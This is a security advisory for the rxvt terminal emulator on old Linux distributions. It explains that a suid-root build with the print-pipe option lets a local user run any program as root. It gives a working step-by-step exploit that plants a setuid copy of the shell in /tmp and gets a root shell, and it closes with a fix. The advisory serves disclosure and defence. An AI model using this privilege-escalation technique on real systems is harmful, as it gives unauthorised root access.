COMMAND

    rxvt

AFFECTED SYSTEMS

    Linux Slackware 3.0, RedHat 2.1
    others with rxvt suid root (and compiled with PRINT_PIPE)

PROBLEM

    There is a  major security hole  in rxvt, a  terminal emulator for
    X, when it  is run on  systems suid root,  as is required  on many
    configurations in order to write to the utmp file.  It is  obvious
    from the code  that this program  was not written  to be run  suid
    root,  its  a  pity  that  sysadmins  that  install  the  compiled
    versions of this sort of code don't see the same warnings of  'run
    suid root at your  own risk' that the  people that put together  a
    distribution with it that way see in the makefile.

    The conditions that allow this particular hole to be exploited  is
    rxvt  compiled  with  the  PRINT_PIPE  option, and is running suid
    root.   The program  sets the  pipe to  "lpr", without a pathname,
    but its even easier  than that to exploit  because we can set  the
    pipe to whatever we want  with the -print-pipe option on  the rxvt
    command line.  Although the programs gives up its root  privileges
    when  forking  to  runn  a  shell  or  other command, the original
    program continues running  suid root the  entire execution of  the
    program.

    Because  the  popen()  call  runs  as  root, whatever program that
    pipe opens will  execute immediately as  root.  In  order to start
    the printer  pipe, the  vt100 printer-on  command is  ESC[5i.  The
    pipe  can  then  be  closed  with  the printer-off commad, ESC[4i.
    Exploiting this is extremely easy.

    1.  Set DISPLAY environment  variable if necessary so you  can use
	x clients.

    2.  In user shell:

	$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
	$ chmod +x /tmp/rxbug
	$ rxvt -print-pipe /tmp/rxbug

    3.  In rxvt xclient:

	$ cat
	  ESC[5i
	  ESC[4i

	(The client will close at this point with a broken pipe)

    4.  $ /tmp/rxsh
	# whoami
	root
	#

SOLUTION

    chmod -s /usr/X11R6/bin/rxvt